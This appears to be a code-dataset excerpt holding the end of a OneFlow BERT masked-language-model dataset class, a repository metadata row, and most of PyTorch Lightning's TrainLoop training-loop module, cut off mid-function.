max_seq_length=512,
mask_lm_prob=0.15,
short_seq_prob=0.0,
max_preds_per_seq=None,
seed=1234,
binary_head=True,
):
self.seed = seed
self.mask_lm_prob = mask_lm_prob
self.max_seq_length = max_seq_length
self.short_seq_prob = short_seq_prob
self.binary_head = binary_head
if max_preds_per_seq is None:
max_preds_per_seq = math.ceil(max_seq_length * mask_lm_prob / 10) * 10
self.max_preds_per_seq = max_preds_per_seq
self.dataset = SentenceIndexedDataset(
data_prefix,
indexed_dataset,
max_seq_length=self.max_seq_length - 3,
short_seq_prob=self.short_seq_prob,
binary_head=self.binary_head,
)
self.tokenizer = tokenizer
self.vocab_id_list = list(tokenizer.get_vocab().values())
self.cls_id = tokenizer.cls_token_id
self.sep_id = tokenizer.sep_token_id
self.mask_id = tokenizer.mask_token_id
self.pad_id = tokenizer.pad_token_id
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
np_rng = np.random.RandomState(seed=(self.seed + idx))
sents = self.dataset[idx]
if self.binary_head:
tokens_a, tokens_b, is_next_random = self.create_random_sentence_pair(sents, np_rng)
else:
tokens_a = []
for j in range(len(sents)):
tokens_a.extend(sents[j])
tokens_b = []
is_next_random = False
tokens_a, tokens_b = self.truncate_seq_pair(
tokens_a, tokens_b, self.max_seq_length - 3, np_rng
)
tokens, token_types = self.create_tokens_and_token_types(tokens_a, tokens_b)
tokens, masked_positions, masked_labels = self.create_masked_lm_predictions(tokens, np_rng)
(
tokens,
token_types,
labels,
padding_mask,
loss_mask,
) = self.pad_and_convert_to_tensor(tokens, token_types, masked_positions, masked_labels)
sample = Instance(
input_ids=DistTensorData(tokens),
attention_mask=DistTensorData(padding_mask),
tokentype_ids=DistTensorData(token_types),
ns_labels=DistTensorData(
flow.tensor(int(is_next_random), dtype=flow.long), placement_idx=-1
),
lm_labels=DistTensorData(labels, placement_idx=-1),
loss_mask=DistTensorData(loss_mask, placement_idx=-1),
)
return sample
def create_random_sentence_pair(self, sample, np_rng):
num_sentences = len(sample)
assert num_sentences > 1, "make sure each sample has at least two sentences."
a_end = 1
if num_sentences >= 3:
a_end = np_rng.randint(1, num_sentences)
tokens_a = []
for j in range(a_end):
tokens_a.extend(sample[j])
tokens_b = []
for j in range(a_end, num_sentences):
tokens_b.extend(sample[j])
is_next_random = False
if np_rng.random() < 0.5:
is_next_random = True
tokens_a, tokens_b = tokens_b, tokens_a
return tokens_a, tokens_b, is_next_random
def truncate_seq_pair(self, tokens_a, tokens_b, max_num_tokens, np_rng):
len_a, len_b = len(tokens_a), len(tokens_b)
while True:
total_length = len_a + len_b
if total_length <= max_num_tokens:
break
if len_a > len_b:
trunc_tokens = tokens_a
len_a -= 1
else:
trunc_tokens = tokens_b
len_b -= 1
if np_rng.random() < 0.5:
trunc_tokens.pop(0)
else:
trunc_tokens.pop()
return tokens_a, tokens_b
def create_tokens_and_token_types(self, tokens_a, tokens_b):
tokens = [self.cls_id] + tokens_a + [self.sep_id]
token_types = [0] * (len(tokens_a) + 2)
if len(tokens_b) > 0:
tokens = tokens + tokens_b + [self.sep_id]
token_types = token_types + [1] * (len(tokens_b) + 1)
return tokens, token_types
def mask_token(self, idx, tokens, np_rng):
label = tokens[idx]
if np_rng.random() < 0.8:
new_label = self.mask_id
else:
if np_rng.random() < 0.5:
new_label = label
else:
new_label = np_rng.choice(self.vocab_id_list)
tokens[idx] = new_label
return label
def create_masked_lm_predictions(
self,
tokens,
np_rng,
max_ngrams=3,
do_whole_word_mask=True,
favor_longer_ngram=False,
geometric_dist=False,
):
cand_indexes = []
token_boundary = [0] * len(tokens)
new_tokens = []
for (i, token) in enumerate(tokens):
new_tokens.append(token % len(self.tokenizer))
if token == self.cls_id or token == self.sep_id:
token_boundary[i] = 1
continue
if (
do_whole_word_mask
and len(cand_indexes) >= 1
and not is_start_piece(self.tokenizer._convert_id_to_token(token))
):
cand_indexes[-1].append(i)
else:
cand_indexes.append([i])
if is_start_piece(self.tokenizer._convert_id_to_token(token)):
token_boundary[i] = 1
tokens = new_tokens
masked_positions = []
masked_labels = []
output_tokens = list(tokens)
if self.mask_lm_prob == 0:
return output_tokens, masked_positions, masked_labels
cand_indexes = []
for (i, token) in enumerate(tokens):
if token == self.cls_id or token == self.sep_id:
continue
if do_whole_word_mask and len(cand_indexes) >= 1 and token_boundary[i] == 0:
cand_indexes[-1].append(i)
else:
cand_indexes.append([i])
num_to_predict = min(
self.max_preds_per_seq, max(1, int(round(len(tokens) * self.mask_lm_prob)))
)
ngrams = np.arange(1, max_ngrams + 1, dtype=np.int64)
if not geometric_dist:
pvals = 1.0 / np.arange(1, max_ngrams + 1)
pvals /= pvals.sum(keepdims=True)
if favor_longer_ngram:
pvals = pvals[::-1]
ngram_indexes = []
for idx in range(len(cand_indexes)):
ngram_index = []
for n in ngrams:
ngram_index.append(cand_indexes[idx : idx + n])
ngram_indexes.append(ngram_index)
np_rng.shuffle(ngram_indexes)
masked_lms = []
covered_indexes = set()
for cand_index_set in ngram_indexes:
if len(masked_lms) >= num_to_predict:
break
if not cand_index_set:
continue
for index_set in cand_index_set[0]:
for index in index_set:
if index in covered_indexes:
continue
if not geometric_dist:
n = np_rng.choice(
ngrams[: len(cand_index_set)],
p=pvals[: len(cand_index_set)]
/ pvals[: len(cand_index_set)].sum(keepdims=True),
)
else:
n = min(np_rng.geometric(0.2), max_ngrams)
index_set = sum(cand_index_set[n - 1], [])
n -= 1
while len(masked_lms) + len(index_set) > num_to_predict:
if n == 0:
break
index_set = sum(cand_index_set[n - 1], [])
n -= 1
if len(masked_lms) + len(index_set) > num_to_predict:
continue
is_any_index_covered = False
for index in index_set:
if index in covered_indexes:
is_any_index_covered = True
break
if is_any_index_covered:
continue
for index in index_set:
covered_indexes.add(index)
label = self.mask_token(index, output_tokens, np_rng)
masked_lms.append(MaskedLmInstance(index=index, label=label))
masked_lms = sorted(masked_lms, key=lambda x: x.index)
for p in masked_lms:
masked_positions.append(p.index)
masked_labels.append(p.label)
return output_tokens, masked_positions, masked_labels
def pad_and_convert_to_tensor(self, tokens, token_types, masked_positions, masked_labels):
num_tokens = len(tokens)
num_pad = self.max_seq_length - num_tokens
assert num_pad >= 0
assert len(token_types) == num_tokens
assert len(masked_positions) == len(masked_labels)
filler = [self.pad_id] * num_pad
tokens = flow.tensor(tokens + filler, dtype=flow.long)
token_types = flow.tensor(token_types + filler, dtype=flow.long)
padding_mask = flow.tensor([1] * num_tokens + [0] * num_pad, dtype=flow.long)
labels = [-1] * self.max_seq_length
loss_mask = [0] * self.max_seq_length
for idx, label in zip(masked_positions, masked_labels):
assert idx < num_tokens
labels[idx] = label
loss_mask[idx] = 1
labels = flow.tensor(labels, dtype=flow.long)
loss_mask = flow.tensor(loss_mask, dtype=flow.long)
return tokens, token_types, labels, padding_mask, loss_mask
@property
def supports_prefetch(self):
return self.dataset.supports_prefetch
def prefetch(self, indices):
self.dataset.prefetch(indices)
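# --- Hedged illustration (not part of the original file) ---
# The ngram-length distribution built in create_masked_lm_predictions above:
# p(n) proportional to 1/n over n = 1..max_ngrams, reversed when
# favor_longer_ngram is set.
import numpy as np

pvals = 1.0 / np.arange(1, 3 + 1)     # max_ngrams = 3
pvals /= pvals.sum(keepdims=True)     # -> approx [0.545, 0.273, 0.182]
assert abs(float(pvals.sum()) - 1.0) < 1e-9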
| true
| true
|
790dc4c70bdebe3d17d0f764a7a35b9714f96983
| 43,077
|
py
|
Python
|
pytorch_lightning/trainer/training_loop.py
|
neggert/pytorch-lightning
|
8208c330eb1a4e8cca243ee525882854dd366921
|
[
"Apache-2.0"
] | null | null | null |
pytorch_lightning/trainer/training_loop.py
|
neggert/pytorch-lightning
|
8208c330eb1a4e8cca243ee525882854dd366921
|
[
"Apache-2.0"
] | null | null | null |
pytorch_lightning/trainer/training_loop.py
|
neggert/pytorch-lightning
|
8208c330eb1a4e8cca243ee525882854dd366921
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import contextmanager, suppress
from copy import copy, deepcopy
from typing import Any, Dict, List, Optional, Union
import numpy as np
import torch
from pytorch_lightning.core.optimizer import LightningOptimizer
from pytorch_lightning.core.step_result import Result
from pytorch_lightning.plugins import ParallelPlugin
from pytorch_lightning.trainer.states import TrainerState
from pytorch_lightning.trainer.supporters import TensorRunningAccum
from pytorch_lightning.utilities import _TPU_AVAILABLE, AMPType, DeviceType
from pytorch_lightning.utilities.distributed import rank_zero_info
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.finite_checks import detect_nan_parameters
from pytorch_lightning.utilities.grads import grad_norm
from pytorch_lightning.utilities.model_helpers import is_overridden
from pytorch_lightning.utilities.parsing import AttributeDict
from pytorch_lightning.utilities.signature_utils import is_param_in_hook_signature
from pytorch_lightning.utilities.warnings import WarningCache
class TrainLoop:
def __init__(self, trainer, multiple_trainloader_mode: str):
self.trainer = trainer
self.accumulated_loss = None
self.warning_cache = WarningCache()
self._teardown_already_run = False
self.running_loss = TensorRunningAccum(window_length=20)
self._curr_step_result = None
self._cur_grad_norm_dict = None
self._multiple_trainloader_mode = multiple_trainloader_mode
self._skip_backward = False
self.trainer._multiple_trainloader_mode = multiple_trainloader_mode
self._optimizer_freq_cumsum = None
def on_trainer_init(
self,
max_epochs: Optional[int],
min_epochs: Optional[int],
max_steps: Optional[int],
min_steps: Optional[int],
num_sanity_val_steps: int,
) -> None:
self.trainer.global_step = 0
self.trainer.current_epoch = 0
self.trainer.should_stop = False
self.trainer.state = TrainerState()
self.trainer.total_batch_idx = 0
self.trainer.batch_idx = 0
self.trainer.num_training_batches = 0
self.trainer.train_dataloader = None
        # If neither max_epochs nor max_steps is set, then use the existing default of max_epochs = 1000
self.trainer.max_epochs = 1000 if (max_epochs is None and max_steps is None) else max_epochs
        # If neither min_epochs nor min_steps is set, then use the existing default of min_epochs = 1
self.trainer.min_epochs = 1 if (min_epochs is None and min_steps is None) else min_epochs
self.trainer.max_steps = max_steps
self.trainer.min_steps = min_steps
if num_sanity_val_steps == -1:
self.trainer.num_sanity_val_steps = float("inf")
else:
self.trainer.num_sanity_val_steps = num_sanity_val_steps
@property
def num_optimizers(self):
num_optimizers = len(self.get_optimizers_iterable())
return num_optimizers
@property
def optimizer_freq_cumsum(self):
if self._optimizer_freq_cumsum is None:
self._optimizer_freq_cumsum = np.cumsum(self.trainer.optimizer_frequencies)
return self._optimizer_freq_cumsum
def should_skip_training(self):
should_by_max_steps = self.trainer.max_steps is not None and self.trainer.global_step >= self.trainer.max_steps
should_by_epoch = self.trainer.max_epochs is not None and self.trainer.current_epoch >= self.trainer.max_epochs
return should_by_max_steps or should_by_epoch or self.trainer.num_training_batches == 0
def on_train_start(self):
# hook
self.trainer.call_hook("on_train_start")
def on_train_end(self):
if self._teardown_already_run:
return
self._teardown_already_run = True
# trigger checkpoint check. need to temporarily decrease the global step to avoid saving duplicates
# when a checkpoint was saved at the last step
self.trainer.global_step -= 1
self.check_checkpoint_callback(should_update=True, is_last=True)
self.trainer.global_step += 1
# hook
self.trainer.call_hook("on_train_end")
# todo: TPU 8 cores hangs in flush with TensorBoard. Might do for all loggers.
# It might be related to xla tensors blocked when moving the cpu
# kill loggers
if self.trainer.logger is not None:
self.trainer.logger.finalize("success")
# summarize profile results
self.trainer.profiler.describe()
# give accelerators a chance to finish
self.trainer.accelerator.on_train_end()
# reset bookkeeping
self.trainer.state.stage = None
def check_checkpoint_callback(self, should_update, is_last=False):
# TODO bake this logic into the ModelCheckpoint callback
if should_update and self.trainer.checkpoint_connector.has_trained:
callbacks = self.trainer.checkpoint_callbacks
if is_last and any(cb.save_last and cb.verbose for cb in callbacks):
rank_zero_info("Saving latest checkpoint...")
model = self.trainer.lightning_module
for cb in callbacks:
cb.on_validation_end(self.trainer, model)
def on_train_epoch_start(self, epoch):
# update training progress in trainer
self.trainer.current_epoch = epoch
model = self.trainer.lightning_module
# reset train dataloader
if epoch != 0 and self.trainer.reload_dataloaders_every_epoch:
self.trainer.reset_train_dataloader(model)
# todo: specify the possible exception
with suppress(Exception):
# set seed for distributed sampler (enables shuffling for each epoch)
self.trainer.train_dataloader.sampler.set_epoch(epoch)
# changing gradient according accumulation_scheduler
self.trainer.accumulation_scheduler.on_train_epoch_start(self.trainer, self.trainer.lightning_module)
# stores accumulated grad fractions per batch
self.accumulated_loss = TensorRunningAccum(window_length=self.trainer.accumulate_grad_batches)
# hook
self.trainer.call_hook("on_epoch_start")
self.trainer.call_hook("on_train_epoch_start")
def on_train_batch_end(self, epoch_output, batch_end_outputs, batch, batch_idx, dataloader_idx):
batch_end_outputs = [opt_idx_out for opt_idx_out in batch_end_outputs if len(opt_idx_out)]
processed_batch_end_outputs = TrainLoop._prepare_outputs(batch_end_outputs, batch_mode=True)
# hook
self.trainer.call_hook('on_train_batch_end', processed_batch_end_outputs, batch, batch_idx, dataloader_idx)
self.trainer.call_hook('on_batch_end')
# figure out what to track for epoch end
self.track_epoch_end_reduce_metrics(epoch_output, batch_end_outputs)
# reset batch logger internals
self.trainer.logger_connector.on_train_batch_end()
def reset_train_val_dataloaders(self, model) -> None:
"""
Resets train and val dataloaders if none are attached to the trainer.
The val dataloader must be initialized before training loop starts, as the training loop
inspects the val dataloader to determine whether to run the evaluation loop.
"""
if self.trainer.train_dataloader is None:
self.trainer.reset_train_dataloader(model)
if self.trainer.val_dataloaders is None:
self.trainer.reset_val_dataloader(model)
def track_epoch_end_reduce_metrics(self, epoch_output, batch_end_outputs):
hook_overridden = self._should_add_batch_output_to_epoch_output()
# track the outputs to reduce at the end of the epoch
for opt_idx, opt_outputs in enumerate(batch_end_outputs):
sample_output = opt_outputs[-1]
# decide if we need to reduce at the end of the epoch automatically
auto_reduce_tng_result = isinstance(sample_output, Result) and sample_output.should_reduce_on_epoch_end
# only track when a) it needs to be autoreduced OR b) the user wants to manually reduce on epoch end
if not (hook_overridden or auto_reduce_tng_result):
continue
# with 1 step (no tbptt) don't use a sequence at epoch end
if isinstance(opt_outputs, list) and len(opt_outputs) == 1 and not isinstance(opt_outputs[0], Result):
opt_outputs = opt_outputs[0]
epoch_output[opt_idx].append(opt_outputs)
def _should_add_batch_output_to_epoch_output(self) -> bool:
# We add to the epoch outputs if
# 1. The model defines training_epoch_end OR
# 2. The model overrides on_train_epoch_end which has `outputs` in the signature
# TODO: in v1.5 this only needs to check if training_epoch_end is overridden
lightning_module = self.trainer.lightning_module
if is_overridden("training_epoch_end", model=lightning_module):
return True
if is_overridden("on_train_epoch_end", model=lightning_module):
model_hook_fx = getattr(lightning_module, "on_train_epoch_end")
if is_param_in_hook_signature(model_hook_fx, "outputs"):
return True
return False
def get_optimizers_iterable(self, batch_idx=None):
"""
Generates an iterable with (idx, optimizer) for each optimizer.
"""
if not self.trainer.optimizer_frequencies:
# call training_step once per optimizer
return list(enumerate(self.trainer.optimizers))
if batch_idx is None:
batch_idx = self.trainer.total_batch_idx
optimizers_loop_length = self.optimizer_freq_cumsum[-1]
current_place_in_loop = batch_idx % optimizers_loop_length
        # find optimizer index by looking for the first {item > current_place} in the cumsum list
opt_idx = np.argmax(self.optimizer_freq_cumsum > current_place_in_loop)
return [[opt_idx, self.trainer.optimizers[opt_idx]]]
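    # --- Hedged illustration (not part of the original file) ---
    # Frequency-based cycling above, e.g. with optimizer_frequencies=[2, 1]:
    # cumsum -> [2, 3]; batch_idx % 3 in {0, 1} selects optimizer 0 and
    # batch_idx % 3 == 2 selects optimizer 1, so batches cycle 0, 0, 1, ...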
def on_after_backward(self, training_step_output, batch_idx, untouched_loss):
training_step_output.detach()
# insert after step hook
self.trainer.call_hook("on_after_backward")
# when in dev debugging track the losses
self.trainer.dev_debugger.track_train_loss_history(batch_idx, untouched_loss.detach())
def _check_training_step_output(self, training_step_output):
if isinstance(training_step_output, torch.Tensor) and not self.trainer.lightning_module.automatic_optimization:
if training_step_output.grad_fn is None:
# TODO: Find why - RuntimeError: Expected to mark a variable ready only once ...
raise MisconfigurationException("In manual optimization, `training_step` should not return a Tensor")
def training_step(self, split_batch, batch_idx, opt_idx, hiddens):
# give the PL module a result for logging
model_ref = self.trainer.lightning_module
with self.trainer.profiler.profile("model_forward"):
args = self.build_train_args(split_batch, batch_idx, opt_idx, hiddens)
# manually capture logged metrics
model_ref._current_fx_name = 'training_step'
model_ref._results = Result()
with self.trainer.profiler.profile("training_step"):
training_step_output = self.trainer.accelerator.training_step(args)
self.trainer.accelerator.post_training_step()
self.trainer.logger_connector.cache_logged_metrics()
self._check_training_step_output(training_step_output)
training_step_output = self.trainer.call_hook("training_step_end", training_step_output)
training_step_output_for_epoch_end, training_step_output = self._process_training_step_output(
training_step_output, split_batch
)
if training_step_output_for_epoch_end is None:
return
# enable empty loss when using manual opt
closure_loss = None
untouched_loss = None
if self.trainer.lightning_module.automatic_optimization:
# accumulate loss. if accumulate_grad_batches==1, no effect
closure_loss = training_step_output.minimize / self.trainer.accumulate_grad_batches
# the loss will get scaled for amp. avoid any modifications to it
untouched_loss = closure_loss.detach().clone()
# result
result = AttributeDict(
closure_loss=closure_loss,
loss=untouched_loss,
training_step_output=training_step_output,
training_step_output_for_epoch_end=training_step_output_for_epoch_end,
)
return result
def _process_training_step_output(self, training_step_output, split_batch):
training_step_output_for_epoch_end = training_step_output
# enable validation_step return None
if training_step_output_for_epoch_end is None:
return None, None
result = self.trainer.lightning_module._results
loss = None
hiddens = None
result["extra"] = {}
# handle dict return
if isinstance(training_step_output, dict):
loss = training_step_output.pop("loss", None)
hiddens = training_step_output.pop("hiddens", None)
if hiddens is not None:
hiddens = hiddens.detach()
result["extra"] = training_step_output
# handle scalar return
elif isinstance(training_step_output, torch.Tensor):
loss = training_step_output
# map to results under the hood
result.minimize = loss
self.trainer.hiddens = hiddens
# track batch for manual reduction with result
result.track_batch_size(len(split_batch))
# track metrics without grads for epoch reduction
training_step_output_for_epoch_end = copy(result)
training_step_output_for_epoch_end = training_step_output_for_epoch_end.detach()
if self.trainer.move_metrics_to_cpu:
training_step_output_for_epoch_end = training_step_output_for_epoch_end.cpu()
return training_step_output_for_epoch_end, result
@staticmethod
def _prepare_outputs(
outputs: List[List[List[Result]]],
batch_mode: bool,
) -> Union[List[List[List[Dict]]], List[List[Dict]], List[Dict], Dict]:
"""
Extract required information from batch or epoch end results.
Args:
outputs: A 3-dimensional list of ``Result`` objects with dimensions:
[optimizer outs][batch outs][tbptt steps].
batch_mode: If True, ignore the batch output dimension.
Returns:
The cleaned outputs with ``Result`` objects converted to dictionaries. All list dimensions of size one will
be collapsed.
"""
processed_outputs = []
for opt_outputs in outputs:
# handle an edge case where an optimizer output is the empty list
if len(opt_outputs) == 0:
continue
processed_batch_outputs = []
if batch_mode:
opt_outputs = [opt_outputs]
for batch_outputs in opt_outputs:
processed_tbptt_outputs = []
for tbptt_output in batch_outputs:
out = tbptt_output.extra
out['loss'] = tbptt_output.minimize
processed_tbptt_outputs.append(out)
# if there was only one tbptt step then we can collapse that dimension
if len(processed_tbptt_outputs) == 1:
processed_tbptt_outputs = processed_tbptt_outputs[0]
processed_batch_outputs.append(processed_tbptt_outputs)
# batch_outputs should be just one dict (or a list of dicts if using tbptt) per optimizer
if batch_mode:
processed_batch_outputs = processed_batch_outputs[0]
processed_outputs.append(processed_batch_outputs)
# if there is only one optimiser then we collapse that dimension
if len(processed_outputs) == 1:
processed_outputs = processed_outputs[0]
return processed_outputs
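    # --- Hedged illustration (not part of the original file) ---
    # _prepare_outputs collapses singleton list dimensions; e.g. with a single
    # optimizer and one tbptt step per batch (batch_mode=False):
    #   [[[r1], [r2]]] -> [{'loss': r1.minimize, **r1.extra},
    #                      {'loss': r2.minimize, **r2.extra}]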
def optimizer_step(self, optimizer, opt_idx, batch_idx, train_step_and_backward_closure):
model_ref = self.trainer.lightning_module
is_lbfgs = isinstance(optimizer, torch.optim.LBFGS)
using_native_amp = self.trainer.amp_backend == AMPType.NATIVE
# native amp + lbfgs is a no go right now
if using_native_amp and is_lbfgs:
raise MisconfigurationException(
'native PyTorch amp and lbfgs are not compatible.'
' To request, please file a Github issue in PyTorch and tag @mcarilli'
)
# wraps into LightningOptimizer only for running step
optimizer = LightningOptimizer._to_lightning_optimizer(optimizer, self.trainer, opt_idx)
# model hook
model_ref.optimizer_step(
self.trainer.current_epoch,
batch_idx,
optimizer,
opt_idx,
train_step_and_backward_closure,
on_tpu=self.trainer._device_type == DeviceType.TPU and _TPU_AVAILABLE,
using_native_amp=using_native_amp,
using_lbfgs=is_lbfgs,
)
def on_before_zero_grad(self, optimizer):
self.trainer.call_hook('on_before_zero_grad', optimizer)
def optimizer_zero_grad(self, batch_idx, optimizer, opt_idx):
self.trainer.accelerator.optimizer_zero_grad(self.trainer.current_epoch, batch_idx, optimizer, opt_idx)
def track_and_norm_grad(self, optimizer):
# track gradient norms
grad_norm_dic = self._track_gradient_norm()
# clip gradients
self.trainer.accelerator.clip_gradients(
optimizer, self.trainer.gradient_clip_val, gradient_clip_algorithm=self.trainer.gradient_clip_algorithm
)
self._cur_grad_norm_dict = grad_norm_dic
def _track_gradient_norm(self):
grad_norm_dict = {}
if (self.trainer.global_step + 1) % self.trainer.log_every_n_steps == 0:
if float(self.trainer.track_grad_norm) > 0:
model = self.trainer.lightning_module
grad_norm_dict = grad_norm(model, self.trainer.track_grad_norm)
return grad_norm_dict
def _tbptt_split_batch(self, batch: Any) -> List[Any]:
splits = [batch]
truncated_bptt_enabled = self._truncated_bptt_enabled()
if truncated_bptt_enabled:
model_ref = self.trainer.lightning_module
with self.trainer.profiler.profile("tbptt_split_batch"):
splits = model_ref.tbptt_split_batch(batch, self._truncated_bptt_steps())
return splits
    def run_training_epoch(self):
        # modify dataloader if needed (ddp, etc...)
        train_dataloader = self.trainer.accelerator.process_dataloader(self.trainer.train_dataloader)

        # track epoch output
        epoch_output = [[] for _ in range(self.num_optimizers)]

        train_dataloader = self.trainer.data_connector.get_profiled_train_dataloader(train_dataloader)
        dataloader_idx = 0
        val_loop_called = False

        batch_idx = None
        is_last_batch = None

        for batch_idx, (batch, is_last_batch) in train_dataloader:
            self.trainer.batch_idx = batch_idx
            self.trainer.is_last_batch = is_last_batch

            # ------------------------------------
            # TRAINING_STEP + TRAINING_STEP_END
            # ------------------------------------
            with self.trainer.profiler.profile("run_training_batch"):
                batch_output = self.run_training_batch(batch, batch_idx, dataloader_idx)

            # when returning -1 from train_step, we end epoch early
            if batch_output.signal == -1:
                break

            # hook
            # TODO: add outputs to batches
            self.on_train_batch_end(
                epoch_output,
                batch_output.training_step_output_for_epoch_end,
                batch,
                batch_idx,
                dataloader_idx,
            )

            # -----------------------------------------
            # SAVE METRICS TO LOGGERS
            # -----------------------------------------
            self.trainer.logger_connector.log_train_step_metrics(batch_output)

            # -----------------------------------------
            # VALIDATE IF NEEDED
            # -----------------------------------------
            should_check_val = self._should_check_val_fx(batch_idx, is_last_batch)
            if should_check_val:
                self.trainer.validating = True
                self.trainer.run_evaluation()
                self.trainer.training = True
                val_loop_called = True

            # -----------------------------------------
            # SAVE LOGGERS (ie: Tensorboard, etc...)
            # -----------------------------------------
            self.save_loggers_on_train_batch_end()

            # update LR schedulers
            monitor_metrics = deepcopy(self.trainer.logger_connector.callback_metrics)
            self.update_train_loop_lr_schedulers(monitor_metrics=monitor_metrics)
            self.trainer.checkpoint_connector.has_trained = True

            # max steps reached, end training
            if (
                self.trainer.max_steps is not None and self.trainer.max_steps <= self.trainer.global_step + 1
                and self._accumulated_batches_reached()
            ):
                break

            # end epoch early
            # stop when the flag is changed or we've gone past the amount
            # requested in the batches
            if self.trainer.should_stop:
                break

            self.trainer.total_batch_idx += 1

            # stop epoch if we limited the number of training batches
            if self._num_training_batches_reached(is_last_batch):
                break

            # progress global step according to grads progress
            self.increment_accumulated_grad_global_step()

        if batch_idx is None:
            # dataloader/iterator did not produce a batch
            return

        # handle epoch_output on epoch end
        self.on_train_epoch_end(epoch_output)

        # log epoch metrics
        self.trainer.logger_connector.log_train_epoch_end_metrics(epoch_output)

        should_check_val = self._should_check_val_fx(batch_idx, is_last_batch, on_epoch=True)
        should_skip_eval = self.trainer.evaluation_loop.should_skip_evaluation(self.trainer.num_val_batches)
        should_train_only = self.trainer.disable_validation or should_skip_eval

        # update epoch level lr_schedulers if no val loop outside train loop is triggered
        if (val_loop_called and not should_check_val) or should_train_only:
            self.trainer.optimizer_connector.update_learning_rates(interval='epoch')

        if should_train_only:
            self.check_checkpoint_callback(True)

        if should_check_val:
            self.trainer.validating = True
            self.trainer.run_evaluation(on_epoch=True)
            self.trainer.training = True

        # increment the global step once
        # progress global step according to grads progress
        self.increment_accumulated_grad_global_step()
    def on_train_epoch_end(self, epoch_output: List[List[List[Result]]]) -> None:
        # inform logger the batch loop has finished
        self.trainer.logger_connector.on_train_epoch_end()

        # prepare epoch output
        processed_epoch_output = TrainLoop._prepare_outputs(epoch_output, batch_mode=False)

        # get the model and call model.training_epoch_end
        model = self.trainer.lightning_module

        if is_overridden('training_epoch_end', model=model):
            # run training_epoch_end
            # refresh the result for custom logging at the epoch level
            model._current_fx_name = 'training_epoch_end'

            # lightningmodule hook
            training_epoch_end_output = model.training_epoch_end(processed_epoch_output)

            if training_epoch_end_output is not None:
                raise MisconfigurationException(
                    'training_epoch_end expects a return of None. '
                    'HINT: remove the return statement in training_epoch_end'
                )

            # capture logging
            self.trainer.logger_connector.cache_logged_metrics()

        # call train epoch end hooks
        self._on_train_epoch_end_hook(processed_epoch_output)
        self.trainer.call_hook('on_epoch_end')

    def _on_train_epoch_end_hook(self, processed_epoch_output) -> None:
        # We cannot rely on Trainer.call_hook because the signatures might be different across
        # lightning module and callback
        # As a result, we need to inspect if the module accepts `outputs` in `on_train_epoch_end`

        # This implementation is copied from Trainer.call_hook
        hook_name = "on_train_epoch_end"

        # set hook_name to model + reset Result obj
        skip = self.trainer._reset_result_and_set_hook_fx_name(hook_name)

        # always profile hooks
        with self.trainer.profiler.profile(hook_name):

            # first call trainer hook
            if hasattr(self.trainer, hook_name):
                trainer_hook = getattr(self.trainer, hook_name)
                trainer_hook(processed_epoch_output)

            # next call hook in lightningModule
            model_ref = self.trainer.lightning_module
            if is_overridden(hook_name, model_ref):
                hook_fx = getattr(model_ref, hook_name)
                if is_param_in_hook_signature(hook_fx, "outputs"):
                    self.warning_cache.warn(
                        "The signature of `ModelHooks.on_train_epoch_end` has changed in v1.3."
                        " `outputs` parameter has been deprecated."
                        " Support for the old signature will be removed in v1.5", DeprecationWarning
                    )
                    model_ref.on_train_epoch_end(processed_epoch_output)
                else:
                    model_ref.on_train_epoch_end()

            # if the PL module doesn't have the hook then call the accelerator
            # used to auto-reduce things for the user with Results obj
            elif hasattr(self.trainer.accelerator, hook_name):
                accelerator_hook = getattr(self.trainer.accelerator, hook_name)
                accelerator_hook()

        if not skip:
            self.trainer._cache_logged_metrics()
    def run_training_batch(self, batch, batch_idx, dataloader_idx):
        # track grad norms
        grad_norm_dic = {}

        # bookkeeping
        self.trainer.hiddens = None

        optimizers = self.prepare_optimizers()

        # track all outputs across time and num of optimizers
        batch_outputs = [[] for _ in range(len(optimizers))]

        if batch is None:
            self.warning_cache.warn("train_dataloader yielded None. If this was on purpose, ignore this warning...")
            return AttributeDict(
                signal=0,
                grad_norm_dic=grad_norm_dic,
                training_step_output_for_epoch_end=batch_outputs,
            )

        # hook
        response = self.trainer.call_hook("on_batch_start")
        if response == -1:
            return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic)

        # hook
        response = self.trainer.call_hook("on_train_batch_start", batch, batch_idx, dataloader_idx)
        if response == -1:
            return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic)

        # lightning module hook
        splits = self._tbptt_split_batch(batch)

        for split_idx, split_batch in enumerate(splits):

            # create an iterable for optimizers and loop over them
            for opt_idx, optimizer in optimizers:

                # toggle model params + set info to logger_connector
                self.run_train_split_start(split_idx, split_batch, opt_idx, optimizer)

                if self.should_accumulate():
                    # For gradient accumulation

                    # -------------------
                    # calculate loss (train step + train step end)
                    # -------------------

                    # automatic_optimization=True: perform ddp sync only when performing optimizer_step
                    # automatic_optimization=False: don't block synchronization here
                    with self.block_ddp_sync_behaviour():
                        self.training_step_and_backward(
                            split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens
                        )

                    batch_outputs = self._process_closure_result(
                        batch_outputs=batch_outputs,
                        opt_idx=opt_idx,
                    )

                # ------------------------------
                # BACKWARD PASS
                # ------------------------------
                # gradient update with accumulated gradients
                else:
                    if self.trainer.lightning_module.automatic_optimization:

                        def train_step_and_backward_closure():
                            result = self.training_step_and_backward(
                                split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens
                            )
                            return None if result is None else result.loss

                        # optimizer step
                        self.optimizer_step(optimizer, opt_idx, batch_idx, train_step_and_backward_closure)

                    else:
                        self._curr_step_result = self.training_step(
                            split_batch, batch_idx, opt_idx, self.trainer.hiddens
                        )

                    if self._curr_step_result is None:
                        # user decided to skip optimization
                        # make sure to zero grad.
                        continue

                    batch_outputs = self._process_closure_result(
                        batch_outputs=batch_outputs,
                        opt_idx=opt_idx,
                    )

                    # todo: Properly aggregate grad_norm across opt_idx and split_idx
                    grad_norm_dic = self._cur_grad_norm_dict
                    self._cur_grad_norm_dict = None

                    # update running loss + reset accumulated loss
                    self.update_running_loss()

        result = AttributeDict(
            signal=0,
